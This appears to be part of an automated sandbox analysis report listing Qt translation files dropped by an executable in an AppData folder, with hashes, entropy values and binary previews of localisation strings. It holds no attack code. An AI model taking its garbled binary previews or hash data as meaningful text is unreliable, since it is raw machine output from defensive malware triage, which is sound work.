                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.631479835393124
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/NVl/lAlHekUOplY1MUce/hlAlI+rwtbWlMpOflUlIPldkOHlz:CwO4+94jUcerAIRt6a6Uloi8
                                                                                                                                                                                                            MD5:6FBA66FE449866B478A2EBA66A724A02
                                                                                                                                                                                                            SHA1:EBEF6ED8460218CE8DF735659A8CBCD693600AC6
                                                                                                                                                                                                            SHA-256:171C7424B24D8502AB53CB3784FF34D8FCFAE26557CF8AF4DFDDEC6485ACC2FE
                                                                                                                                                                                                            SHA-512:2D2438738C6D10D8A53B46DE5A94BBF993818D080F344D9F1B94FC83D60335D9A5E8EFCC297D593FFF1D427972F9F9502FC31C332CAEA579FC7A88487390457E
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......ca....v.....q.t.b.a.s.e._.c.a.....q.t.s.c.r.i.p.t._.c.a.....q.t.m.u.l.t.i.m.e.d.i.a._.c.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.a.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):157
                                                                                                                                                                                                            Entropy (8bit):3.7483537099309427
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/fVFlAlHekUsplY1MUcM/hlULlI+rwtbWlMpsfl8IPldkO1lPchn:CwY4+9ujUcMrURIRt6aE8oinh
                                                                                                                                                                                                            MD5:D033053C03C3ECFA2AA926E0E674F67F
                                                                                                                                                                                                            SHA1:B4E95F8278121E2549F8BB6B5DAF1496F1738A7D
                                                                                                                                                                                                            SHA-256:3C0CBFD19490D67D1B3B9E944C3A4D9A9E7F87D7AE35E88D5D5A0077349B5B21
                                                                                                                                                                                                            SHA-512:2C7E9E9DBE0B25FBA94A52FE4BCCB1D9FED2A7BD2877DB91F82546C3BC8606280949594227BA0FC1C74C31010E1F573B3A82852BE746EAA4F397140485789136
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......cs....v.....q.t.b.a.s.e._.c.s.....q.t.s.c.r.i.p.t._.c.s.....q.t.m.u.l.t.i.m.e.d.i.a._.c.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.c.s...........
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/4Jlr/lAlHekT6hY1MUb6JAlI+rwtbWlMuel3UlIPldkOQtt:Cw7rC+3jUkAIRt6EVUloi9
                                                                                                                                                                                                            MD5:E6A683F4A0883B5B0C7D30B847EF208C
                                                                                                                                                                                                            SHA1:FF2440DBBFE04AD86C6F285426AAFD49A895B128
                                                                                                                                                                                                            SHA-256:B5036161CE808C728E5FDA985F792DB565831FD01CF00B282547790C037353A2
                                                                                                                                                                                                            SHA-512:D73B794A71DFD3A3C06BF43ED109F635B4960F9A3904FB728873AB5251BDF6A791DDFDEBA884A2703A35461E18BA902804095AC4B92A2C9361526469B6D35FFA
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......da....v.....q.t.b.a.s.e._.d.a.....q.t.s.c.r.i.p.t._.d.a.....q.t.m.u.l.t.i.m.e.d.i.a._.d.a... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.a.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6174817344122334
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/8rJFlAlHekTul01MUbul4LlI+rwtbWlMuallyIPldkOknt:Cw/rJ4+XU5RIRt6Aaoi7t
                                                                                                                                                                                                            MD5:06168E1261BF72F49F94927723B2E1EB
                                                                                                                                                                                                            SHA1:DEAF1B53C3FEE6CB28840418D0060AFA4D59D3FC
                                                                                                                                                                                                            SHA-256:5805B8FF3747849794E2D70661D737C69C15F1AE763C38E17084B1E5A81E9153
                                                                                                                                                                                                            SHA-512:AA3915C029C74DC270514C7F50E8BEC06C825F278E0DE0477AD8ED3187700BBD7711382A6E47C3AC76AC756CEFF9FA8CDD4E9B9DAC817475BC122F78B02C7D7D
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......de....v.....q.t.b.a.s.e._.d.e.....q.t.s.c.r.i.p.t._.d.e.....q.t.m.u.l.t.i.m.e.d.i.a._.d.e... .q.t.x.m.l.p.a.t.t.e.r.n.s._.d.e.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):16
                                                                                                                                                                                                            Entropy (8bit):4.0
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4n:CwZ
                                                                                                                                                                                                            MD5:BCEBCF42735C6849BDECBB77451021DD
                                                                                                                                                                                                            SHA1:4884FD9AF6890647B7AF1AEFA57F38CCA49AD899
                                                                                                                                                                                                            SHA-256:9959B510B15D18937848AD13007E30459D2E993C67E564BADBFC18F935695C85
                                                                                                                                                                                                            SHA-512:F951B511FFB1A6B94B1BCAE9DF26B41B2FF829560583D7C83E70279D1B5304BDE299B3679D863CAD6BB79D0BEDA524FC195B7F054ECF11D2090037526B451B78
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.6070658648473097
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/7lJFlAlHekSMthULlI+rwtbWlMvEJY1MUaEf8IPldkOzvt:CwElJ4+7MrURIRt6cujUaE8oi0F
                                                                                                                                                                                                            MD5:EE47DFADBA4414FDC051C5CFBE71DDC1
                                                                                                                                                                                                            SHA1:DE650E96A9C130D35F8A498202773EF7FC875D27
                                                                                                                                                                                                            SHA-256:E25E43F046F61022FFE871A2F73C6A12EDFC5C3EFD958C0E019A721860A053B0
                                                                                                                                                                                                            SHA-512:8C1D8901D2F66CCBF947B831858E08B703517470B2B813B241E00162A275AC9103FF5B9251AD39BD53551E0A4FB45EE74187B218A1EF7C6CF6C5FA9F9219AE04
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......es....v.....q.t.b.a.s.e._.e.s.....q.t.m.u.l.t.i.m.e.d.i.a._.e.s.....q.t.s.c.r.i.p.t._.e.s... .q.t.x.m.l.p.a.t.t.e.r.n.s._.e.s.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):293121
                                                                                                                                                                                                            Entropy (8bit):5.272179385890926
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:gEo2cQbzaVmvGQYkHkMRKkNeGr+0BhaRsLAChY21rpnLqL9ytnvC58gypn4l4qF:gEZbza0HjeGrxBhaCLFC
                                                                                                                                                                                                            MD5:F9C3624197ACB30A9E6CC799BB65BED6
                                                                                                                                                                                                            SHA1:D715EAE24387DE15588F68C92991A93FAFB5EEAB
                                                                                                                                                                                                            SHA-256:B292AFB0763B8C7C30A5AF7372BFC12D8A0D00BF3DD4A000715D9F576D9C1A39
                                                                                                                                                                                                            SHA-512:199C107AE7EAFCF2A5EEC149CAFEE7ED09B938E204B56AD3AAC9568D27166F61EC8E2225A11AF26F7E1F035FB5CAD98621A01E8A9942D18C273F43B90201162A
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......faB..I....*...u...+...............@.......A...J...B.......C...X...D.......E.......F...%...G.......H...0...I.......P...v...Q.......R.......S.......T..."...U.......V...h...W.......X...s...Y.......]..e....t...................-.......W.......|.......i...;..Eu...;..Z....;...]...;..c....;.......;..0]...M..f....O.......O..2.......#....}..f=...m..fg.........(5......+;..1a..+;...V..+;...!..+O..17..+O...(..1.......E@......F....u..H4......HY...Y..H....S..I....5..I@.....IA......IC......J...1...J.......J.......J...|...K...6...LD......L.......PS......R....Z..T.......Zr.. ...[`...O..[`......\...%@..\...2..._...&l.._...38..1........E..........2u..........1.......1...........@......4G...........................$...L...$..xY...[.......,...u...y...y...y..z.......F.......<.......g.......5W...........9...........f...E...U...E../....E..................0-...%..6....%.........................3......f..........5...?...0..EK...0......0..L ...0..c....0.......0...Z...5...........Y.. D
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):117
                                                                                                                                                                                                            Entropy (8bit):3.739162292019161
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/4HlAlHekRgOp1MUZWJKlI+rwtbWlMsIkk:Cwxe++IUocIRt6Qkk
                                                                                                                                                                                                            MD5:72882942B07B8AAC98034016E752B1A0
                                                                                                                                                                                                            SHA1:BF23B4C136B863B10E770019A2DF62FC988859DF
                                                                                                                                                                                                            SHA-256:048CA42DCE4FAF5FC21D843576E3C6FD963146ECC78554E7E5F34D07F64FB213
                                                                                                                                                                                                            SHA-512:403E7F4E9A0E44F2118804F0781A18EB1852797825498751E3AFA02D9558D90293ABDB570786CED80F7EFF800BEF6D9444A72E6A640D331DA46B2A0EA43C8E96
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fi....R.....q.t.b.a.s.e._.f.i.....q.t.s.c.r.i.p.t._.f.i.....q.t.m.u.l.t.i.m.e.d.i.a._.f.i.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):153
                                                                                                                                                                                                            Entropy (8bit):3.680458675741643
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/FjlAlHekRL21MUZNJOLlI+rwtbWlMs9KIPldkORT:Cw3+SU0RIRt6koio
                                                                                                                                                                                                            MD5:3C45C665CFE036A7474CB4DCBB13CF40
                                                                                                                                                                                                            SHA1:62312DFF3C4CD38BAE8456C981601D0D89600F63
                                                                                                                                                                                                            SHA-256:8624033D849E670B12C9532337FCBF260F20848E044FEE7787CFE2AC92BE28DB
                                                                                                                                                                                                            SHA-512:21659AA452BC2493D915F0BE94F90CDD57759B1F1306AAA2836058D41E80DED24742EBD74E19420021514A6AB4150CA0B447574E96B9D3BF0BC5A8C78DAAF7AC
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......fr....v.....q.t.b.a.s.e._.f.r.....q.t.s.c.r.i.p.t._.f.r.....q.t.m.u.l.t.i.m.e.d.i.a._.f.r... .q.t.x.m.l.p.a.t.t.e.r.n.s._.f.r.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):70
                                                                                                                                                                                                            Entropy (8bit):4.463523104731333
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/EXlAlHekQrEuknbJB:CwjO+5JY
                                                                                                                                                                                                            MD5:A8D55457C0413893F746D40B637F9C93
                                                                                                                                                                                                            SHA1:25123615482947772176E055E4A74043B2FBCAA0
                                                                                                                                                                                                            SHA-256:49DF855A004A17950338AF3146466F6DF4D5852410BD0B58EA80E0D0203A9D24
                                                                                                                                                                                                            SHA-512:99718B948D94B292BDEDF6B247A5856BC7AC78408FCC41C980F264C2C8565125786F0289F5F993DCF11B8CDA3AFB2A1D8634B1D0BC9B34992F538F8E4086EC00
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gd..........q.t.b.a.s.e._.g.d....................
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):323590
                                                                                                                                                                                                            Entropy (8bit):4.568068046062524
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3072:OYSG8zxWSDjq73Pf6FT1f4uh50QGrRfFD54YyUY0Ou4/tnra3Z0uYhB5YHfHRRn2:O39WSD3TMQGrxFD5EUVQ
                                                                                                                                                                                                            MD5:0661FFABFBC50187F3BA38876B721946
                                                                                                                                                                                                            SHA1:EB5E7205355CFC6BCB4DF27E224079842C97B296
                                                                                                                                                                                                            SHA-256:204A01AC7DEB6B5BAE193AFECBD1E50D18C73BF7D94BADEB2BBFDF6123C4ED93
                                                                                                                                                                                                            SHA-512:65AB66CC54D65E7678FA731A5C5F2CC9D6FC217B91AD47D538440811E09A23E49CD95CE62A79E3E8C275E250AC1A0B54BD289F6DD067573876DA7AFF54381D02
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......gl_ESB..I....*.......+..&............@.......A...z...B.......C...p...D.......E......F...!...G......H.......I......P...@...Q.......R......S...5...T......U...+...V.......W...a...X.......Y...N...]..o....t..,................F.......p..............4....;..LI...;..bD...;.......;.......;.......;..cJ...M..o1...O..G....O..e.......U....}..oY...m..o........D..(5...X..+;..6/..+;...~..+;......+O..6...+O...N..1......E@...?..F.......H4..'...HY......H...3`..I......I@......IA......IC..0...J...P...J...1...J...0...J.......K...:...LD..2...L...3...PS..:A..R... d..T.......Zr..Rd..[`......[`.....\...WK..\...RR.._...X..._...f...1........E...{......7M..........1.......1....q......O.......9...............*.......)....$... ...$.......[..,=...,..-....y..0X...y...~......Mx......]0.......H......:A......0....9...............E...o...E..b....E.........1.......c....%..;....%...;......3.......^......S................5..4Z...0..L....0.......0..n....0.......0..7....0.......5..9D......!g.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):83
                                                                                                                                                                                                            Entropy (8bit):3.880645689209568
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:3:j2wZC4C/YJ/dQlHekfaB21MUXmlvt:CwT0+D/UUt
                                                                                                                                                                                                            MD5:DD5C2C6B148F2DB3E666B859776AE129
                                                                                                                                                                                                            SHA1:8368F32039CC0776A1B95C9DED5FE6C9EA0D93FD
                                                                                                                                                                                                            SHA-256:C113D14E218D5402B616DABEA27969C6F83852676468C5EF051DDDEFB3EE0235
                                                                                                                                                                                                            SHA-512:2EAE33C8707407E083F6B8B05EA2C5B987646DF1553888C16D6508C5A33B2F758DDED73323622CD50324C96F51D61B7CE822F393551A30B211ABD3CC1367249F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......he....0.....q.t.b.a.s.e._.h.e.....q.t.s.c.r.i.p.t._.h.e.......
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):8743
                                                                                                                                                                                                            Entropy (8bit):5.189558605179696
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:YUM7gBwnG4Vxj4nyn9aAMOJckrL6esm/0sQ5HeK1nvEB:YBkKnZxkyn9aAMWPsm/0sQsGvEB
                                                                                                                                                                                                            MD5:CCD39A7C8139AD041E31B3E5D40968B4
                                                                                                                                                                                                            SHA1:5751BE96817BB6AE7C9DA9F1FBA7F42F31CFCC5D
                                                                                                                                                                                                            SHA-256:222088C9752D1CC3BAB985EF2DC77E5AE78578DCE18A61EC15B39F02E588163D
                                                                                                                                                                                                            SHA-512:9844C0EC65EE1C76DBA021EAC6D476A85E6C8F5BBAF4150C1EA80C0A95BEDE67B5E8F981360EF8599FCECDFCBCB83BC0B8AC44DDEFDCD85F914318030E346967
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......arB.....(.....d.0T....*.5w......Uj....!.`.....M.a[............n..t..............39....&................B<s...V..M^...e......4.O5^...r..)^......o>...........?...t.....D ......k.N.....k.N...C...n...T...I...R..........2>.................|..G.......w....T.......l..........,................^............$a......6.>...........x..K......W.b....._Xn......GN...m..~......!.....J.K.H.............pN.............P.~.....o.....W..(.......~......s.>......%c.....o.....R.z.q..........................n.h................e.....i..........:.J.1. .E.3.E.Q.I..........Untitled.....QHelp.....8.*.9.0.Q.1. .F.3... .E.D.A.Q. .'.D.*.Q.,.E.J.9.).:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.......*.9.0.Q.1. .%.F.4.'.!. .'.D./.Q.D.J.D.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....>.*.9.0.Q.1. .%.F.4.'.!. .,./.'.H.D. .A.J. .'.D.E.D.A.Q. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....L.*.9.0.Q.1. .*.
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):10599
                                                                                                                                                                                                            Entropy (8bit):5.192287379770591
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:jhYkcd7CYBdmfIOeX3byuJRoZXlBYnEpUYR+BJqO5X9pA2NNrxC0zwRK2nMY762A:a71DQIrLuVCnEtR+DquhN5xC0zwKPYHA
                                                                                                                                                                                                            MD5:5538049DA3A1D1D724AB6E11D2E2EDBE
                                                                                                                                                                                                            SHA1:7256BE390B88A053C0252488C443BE42F6F2D92A
                                                                                                                                                                                                            SHA-256:CBCDD1E0BBAE332D80DDB0A286056F17C824FA28D353D7FDF12FC97D9F6FE054
                                                                                                                                                                                                            SHA-512:DD98CAF3A016968EEDC9106C1839DDECC2D109E9E354708BD74B35E766C6A098C1680C0B867EAD9FCE2E2A6D683BE673B8E5DF1A1B2F1AAFDB31910FF833370F
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......bgB...(.(.......0T......5w... S.Uj......`.......a[....(..........t..............39..........&..........B<s...4..M^..........q...J..%..O5^...O..)^...I..o>...I...J..%.......#....t...A.8dz..$..D ....Z.k.N...<.k.N.......n.......I..............2>...p................G..."...w....................7..,................^............$a....<.6.>..........#...K...........$1.W.b....._Xn......GN...*..~....-..TH.."..!.....5.K.H..#R.........pN..."......&..P.~...@.o.....v..(.........."8..~......s.>.....o.... ..z.q..........................O.h....!t..........e....mi..'.....|.(...@.8.G.8.=.0.B.0. .<.>.6.5. .4.0. .5.,. .G.5. .4.>.:.C.<.5.=.B.0.F.8.O.B.0. .2.A.5. .>.I.5. .A.5. .8.=.4.5.:.A.8.@.0...).........M(The reason for this might be that the documentation is still being indexed.).....QCLuceneResultWidget.........0.1.5.;.5.6.:.0.:..........Note:.....QCLuceneResultWidget.....,. .5.7.C.;.B.0.B.8. .>.B. .B.J.@.A.5.=.5.B.>..........Search Results.....QCLuceneResultWidget....... .
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7444
                                                                                                                                                                                                            Entropy (8bit):4.580794980254807
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:192:G8oS34B7n303D37Bn3Jso37cfp3Mg3H373R58noct36R9RFu:GQU7ETrxZvqTXLSoct36Pzu
                                                                                                                                                                                                            MD5:66722ED97BCBFD3DAE3C8264413859AB
                                                                                                                                                                                                            SHA1:400A93B213FCF9BBC9785881EA82ADB9F444CD6C
                                                                                                                                                                                                            SHA-256:ECD4283A660F2CF72849B323810D7EADD063120B6F561E05AA1243A5B280946A
                                                                                                                                                                                                            SHA-512:B898BAC9652D7532384ED5CC53FA62DB55D516421D13F815A3E6D5E80AD4C69555F1A7E6C51F8B0A234614824EEE01D6731458F90D40A585990F84A58B9ABE44
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......caB............%.......0T......K:^.....Uj......`.....P..YJ...V.E.4...*...........>...7........B<s.....B\>...6........+.s.....zq.......9.......vR......@.......@.......:....;.8Z....!.g.N......F................t.....D ....z.k.N.......I......^......`#.......2.......G........N...7......N......{..................K...............GN......NO...5.........K.H...@.........pN......V............q..................>...N.........~.....5..%c...:.z.q....i...4....".A.f.e.g.e.i.x. .u.n. .f.i.l.t.r.e..........Add Filter.....FilterNameDialogClass.......N.o.m. .d.e.l. .f.i.l.t.r.e.:..........Filter Name:.....FilterNameDialogClass.......S.e.n.s.e. .t...t.o.l..........Untitled.....QHelp.....`.N.o. .s.'.h.a. .p.o.g.u.t. .c.o.p.i.a.r. .e.l. .f.i.t.x.e.r. .d.e. .c.o.l...l.e.c.c.i...:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....H.N.o. .s.'.h.a. .p.o.g.u.t. .c.r.e.a.r. .e.l. .d.i.r.e.c.t.o.r.i.:. .%.1..........Cannot create directory: %1.....QHelpCollect
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):15297
                                                                                                                                                                                                            Entropy (8bit):4.708378368926237
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:384:hmv1gdEYEiNrVhTBvAn1ca1f5lwHoJr0vwuxqsP/5jxA:o1gdEvgbloCof9ixqspW
                                                                                                                                                                                                            MD5:ED228F0F60AE9AEC28AB9171D5AE9590
                                                                                                                                                                                                            SHA1:7F061CF0C699D125A5531E3480C21964452F45EA
                                                                                                                                                                                                            SHA-256:4AC56FC63E400943BAB13F1D4C418502138908E1D488C24AEE6131D3D17552AA
                                                                                                                                                                                                            SHA-512:794CC671C08BFC50980820A6389B9D0D3514619AD0A8F18EFD5554CBBF2482192DF00B9D3B05FEE45F42276E63E2375FB28E193930D426245035B4B0E3E14ED8
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......cs_CZB...H.(.......(.......0T......0T......5w...0..Uj......`.......a[......a[....$.......p..........t.......t...........!..1"....T.39....T.39.......s...0......(......7/.................B<s...L..MQ......M^../q..........J..6@.0....*B.O5Q..'..O5^..(A..)Q...X..)^......o>..........+....J..6.......4....t.....8dz..5..D ....R.D ......k.A.....k.A.....k.N.....k.N.......n.."....I..........................2...21......2>..........d.............T..G...4...w...!N......&O......&....!..".......#E..,...,.......)....Q..$/...^..$................$a......6.>.. t......5...K.......K....)......5E.W.b..-.._Xa..%a._Xn..%...GA......GN...?......,9..~.......TH..3..!....*..K.H..4h.........pA...J..pN..........7..P.~.. ..o.....0..(....*..(..........3V..~....T.s.1.....s.>..._.o....0..o....1p.z.q..........'9.....#........^.........h....2................Z..e... .i..8J......(.D.o.v.o.d.e.m. .p.r.o. .t.o. .b.y. .m.o.h.l.o. .b...t.,. .~.e. .d.o.k.u.m.e.n.t.a.c.e. .j.e. .s.t...l.e. .j.e.a.t...
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):4795
                                                                                                                                                                                                            Entropy (8bit):4.530246422531362
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:X82wNlnKfN1LMFy7LsF3ZqBFZjWo0koBLqBXXjGL0qU7UqB7zoElmP5MUu4DZIHU:XM01f7eOnoB8X2s7Vfg5Mi4beXiOUu
                                                                                                                                                                                                            MD5:1D09BEE1FB55A173F7EB39B9A662A170
                                                                                                                                                                                                            SHA1:C77F0A148262A91679F19689E4790B754D45D5D5
                                                                                                                                                                                                            SHA-256:6BB092552A398687119F6D52145F04BF8373977446D8F00C0DCBD56B96829F0F
                                                                                                                                                                                                            SHA-512:BE5A31A6135E8DB024A8B0EB20C4D8EECBF76861F83FF83B4CA97327DB74AD94BB5D77B4E0A59A33B697C32A4EACD61B8C878951F2C545385C74D99FCE56FEE1
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
                                                                                                                                                                                                            Preview:<.d....!..`.......daB.....%.....m.0T......Uj....V.`....................k.B<s.....B\>..........6.+.s...............t.....D ....|.k.N...9...I...O..2.......G....B...N...O..............!..K...._..........GN...........@.K.H.............pN..............>.....~.....m..%c.....z.q....i..........U.n.a.v.n.g.i.v.e.t..........Untitled.....QHelp.....D.K.a.n. .i.k.k.e. .k.o.p.i.e.r.e. .s.a.m.l.i.n.g.s.f.i.l.e.n.:. .%.1..........Cannot copy collection file: %1.....QHelpCollectionHandler.....6.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .m.a.p.p.e.n.:. .%.1..........Cannot create directory: %1.....QHelpCollectionHandler.....V.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .i.n.d.e.k.s.t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1...........&Cannot create index tables in file %1......QHelpCollectionHandler.....J.K.a.n. .i.k.k.e. .o.p.r.e.t.t.e. .t.a.b.e.l.l.e.r. .i. .f.i.l.e.n. .%.1........... Cannot create tables in file %1......QHelpCollectionHandler.....P.K.a.n. .i.k.k.e. .i.n.d.l...s.e. .s.q.l.i.t.e.-.d.a.t.a.b.a.s.e.-.d.r
                                                                                                                                                                                                            Process:C:\Users\user\AppData\Roaming\HseeHuht\check.exe
                                                                                                                                                                                                            File Type:Qt Translation file
                                                                                                                                                                                                            Category:dropped
                                                                                                                                                                                                            Size (bytes):7570
                                                                                                                                                                                                            Entropy (8bit):4.550982634910665
                                                                                                                                                                                                            Encrypted:false
                                                                                                                                                                                                            SSDEEP:96:8y/gPmmhL/7LlSivP6kBL7jb0RNUzzpld4UGG3Ik18fLP0L7fGc0OeVP8a8hiAwj:1OD7hx/Bv3oNuFX4iqgv34fZsu
                                                                                                                                                                                                            MD5:3B070D169E3381E2FB081172934AAD00
                                                                                                                                                                                                            SHA1:70886EB7EF566B296D0814BD4C2440AC176699D6
                                                                                                                                                                                                            SHA-256:9962523FBAE9F1E4C3B5C3C16860D059291CB30DC5EBE5A5EDA4C836A03FED1E
                                                                                                                                                                                                            SHA-512:271B730B5A7358E923BBBC6FA074A72DA52FA47E3B7726779EF7034200EDA09BF0E1AE4E7B11B59F76805F48DC285F6EFC245EB9C7F4A748BE82B25CEE1DDCAE
                                                                                                                                                                                                            Malicious:false
                                                                                                                                                                                                            Reputation:unknown
